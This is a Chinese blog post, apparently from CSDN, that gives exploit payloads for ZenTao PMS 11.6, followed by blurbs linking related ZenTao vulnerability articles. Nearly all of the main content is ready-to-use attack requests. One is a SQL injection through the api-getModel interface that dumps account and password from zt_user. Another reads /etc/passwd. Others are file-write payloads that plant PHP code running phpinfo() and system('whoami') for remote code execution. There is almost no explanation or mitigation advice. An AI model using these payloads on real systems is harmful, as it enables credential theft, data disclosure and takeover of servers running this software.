禅道CMS 11.6漏洞

最新推荐文章于 2025-03-27 16:22:23 发布

chaojixiaojingang

最新推荐文章于 2025-03-27 16:22:23 发布

阅读量5.1k

点赞数 1

CC 4.0 BY-SA版权

本文链接：https://blog.csdn.net/qq_36197704/article/details/108493480

本文深入探讨了 Zentao PMS 中存在的三种关键安全漏洞：SQL 注入、任意文件读取及远程代码执行。通过具体的 Payload 示例，详细展示了攻击者如何利用这些漏洞获取敏感信息或执行恶意代码。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一.SQL注入漏洞

Payload:

http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

二.任意文件读取漏洞

Payload：

http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd

三.远程代码执行漏洞

1）远程代码执行命令phpnifo()；

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=<?php phpinfo(); ?>

Payload2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=<?php phpinfo(); ?>

2）远程代码执行命令system('whoami');

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=<?php system('whoami'); ?>

Payload 2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=<?php system('whoami'); ?>

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

chaojixiaojingang

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

禅道 11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞

nnn2188185的博客

04-13

947

禅道 11.6 zentao/api-getModel-api-sql-sql 版本中对用户接口调用权限过滤不完善，导致调用接口存在SQL注入漏洞。

【漏洞复现】禅道项目管理系统-未授权-api

知黑而守白

05-31

299

禅道项目管理系统（以下简称禅道系统）是一个开源的项目管理软件，专门设计用于敏捷开发，提供了需求管理、任务管理、缺陷跟踪、测试管理和项目绩效等功能，帮助团队更高效地进行项目规划和执行。影响范围v16.x

参与评论您还未登录，请先登录后发表或查看评论

禅道项目管理系统身份认证绕过漏洞

huangyongkang666的博客

04-27

2083

禅道项目管理软件是国产的开源项目管理软件，专注研发项目管理，内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能，完整覆盖了研发项目管理的核心流程。禅道项目管理系统存在身份认证绕过漏洞，远程攻击者利用该漏洞可以绕过身份认证，调用任意API接口并修改管理员用户的密码，并以管理员用户登录该系统，配合其他漏洞进一步利用后，可以实现完全接管服务器16.x

禅道CMS文件上传漏洞（CNVD-C-2020-121325）

热门推荐

chaojixiaojingang

10-30

1万+

1.影响版本 <=12.4.2 2.漏洞描述禅道CMS<=12.4.2版本存在文件上传漏洞，该漏洞由于开发者对link参数过滤不严，导致攻击者对下载链接可控，导致可远程下载服务器恶意脚本文件，造成任意代码执行，获取webshell。 3.漏洞POC 1）http://[目标地址]/www/client-download-[$version参数]-[base64加密后的恶意文件地址].html 2）http:// [目标地址] /www/index.php?m=clie...

禅道项目管理系统存在远程命令执行漏洞（RCE）

nnn2188185的博客

04-14

4383

禅道是第一款国产的开源项目管理软件，也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞，官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致，攻击者可利用该漏洞在未授权的情况下，通过权限绕过在服务器执行任意命令。

【组件攻击链】禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用

further_eye的博客

12-21

5108

近年来禅道漏洞频发，从2018年开始，每年都会爆出比较严重的高危漏洞，通过这些高危漏洞均可对服务器造成一定的影响，甚至可以获取服务器的最高权限。

禅道项目管理系统身份验证漏洞分析QVD-2024-15263

shelter1234567的博客

05-03

1954

最近不怎么更新了！向小伙伴说明下我不是什么组织更不什么经销号（尽管csdn有很多经销广告号）一确实是下岗了！忙着为找工作而发愁。简历都投出去如同石沉大海能不愁吗!.哎......二是忙着论文及材料的事....三是也看了最近的漏洞，感觉也没啥可分析的一眼就看出问题所在。有什么可分析的呢！就像医生看看患者如同看萝卜白菜一样.....，那分析反序列化链呢，这也没什么意思啊！话说到此，今儿个就推荐你看这篇文章。有一定难度挑战度，内容还是跟以前一样，以一个挖洞者的视角来讲解分析。

禅道11.6 docker安装以及漏洞复现

qq_44122254的博客

12-09

1198

禅道11.6 docker安装以及漏洞复现

禅道cms 12.4.2

10-13

禅道CMS是一款开源的内容管理系统，版本为12.4.2。它提供了一套完整的网站搭建和管理解决方案。禅道CMS具有强大的功能和灵活的扩展性。它支持多个页面模板、多个语言版本、多种权限设定等。用户可以根据自己的需求...

74cms代码执行漏洞

01-03

74cms代码执行漏洞 docker

禅道 11.6版本后台漏洞复现和审计

weixin_45427650的博客

04-04

3619

文章目录查看版本漏洞sql注入任意文件读取rce 禅道 11.6版本下载地址本次复现环境windows 先搞清楚禅道参数的传递方式，进入index.php慢慢看先发现了这个语句：这个导致禅道的查看版本信息的漏洞跟进看一下查看版本漏洞复现payload：http://ip/zentao/index.php?mode=getconfig 跟进exportConfig() 文件位置：zentao\framework\router.class.php 调用父类的exportConfig()

【漏洞复现】禅道——未授权登入（QVD-2024-15263）

LongL_GuYu的博客

07-06

5045

禅道（Zentao）是一款开源的项目管理和协作软件。禅道项目管理系统中的存在QVD-2024-15263身份认证绕过漏洞。攻击者可利用该漏洞创建任意账号实现未授权登录。

禅道后台命令执行漏洞

最新发布

Palpitate_LL的博客

03-27

766

禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体，是一款专业的研发项目管理软件，完整地覆盖了项目管理的核心流程。禅道管理思想注重实效，功能完备丰富，操作简洁高效，界面美观大方，搜索功能强大，统计报表丰富多样，软件架构合理，扩展灵活，有完善的 API 可以调用。禅道后台存在 RCE 漏洞，均存在于历史版本，对这些漏洞进行复现分析。

禅道身份认证绕过漏洞(QVD-2024-15263)复现

fly夏天的博客

06-19

3952

QVD-2024-15263 禅道身份认证绕过漏洞复现和原理介绍。

禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)

m0_46604997的博客

06-05

1071

1.1、基本信息禅道是一款支持敏捷、瀑布、看板等多种项目模型的开源项目管理软件，可完整覆盖研发项目的需求、任务、缺陷、用例、质量、组织知识库等流程。禅道提供多个版本，包括免费的开源版、付费的企业版、旗舰版、IPD版和云禅道，以及DevOps平台版，满足不同行业和规模的项目管理需求。1.2、问题描述禅道系统存在身份认证绕过，在处理某些API时未能有效检查用户身份，允许未认证的用户执行某些操作，从而绕过鉴权机制。

禅道(QVD-2024-15263)未授权漏洞

u013008898的博客

10-11

309

1.获取cookie值。

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

weixin_30781567的博客

05-17

997

禅道全版本rce漏洞复现笔记漏洞说明禅道项目管理软件是一款国产的，基于LGPL协议，开源免费的项目管理软件，它集产品管理、项目管理、测试管理于一体，同时还包含了事务管理、组织管理等诸多功能，是中小型企业项目管理的首选，基于自主的PHP开发框架──ZenTaoPHP而成，第三方开发者或企业可非常方便的开发插件或者进行定制。此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的，因此禅道几乎所...

禅道项目管理系统远程命令执行漏洞

qq_18209847的博客

01-12

1433

禅道项目管理系统远程命令执行漏洞，禅道是第一款国产的开源项目管理软件，它的核心管理思想基于敏捷方法 scrum，内置了产品管理和项目管理，同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能，在一个软件中就可以将软件研发中的需求、任务、bug、用例、计划、发布等要素有序地跟踪管理起来，完整地覆盖了项目管理的核心流程。

禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)附带POC

hream的博客

05-10

3011

漏洞QVD-2024-15263描述了禅道项目管理系统中的身份认证绕过漏洞。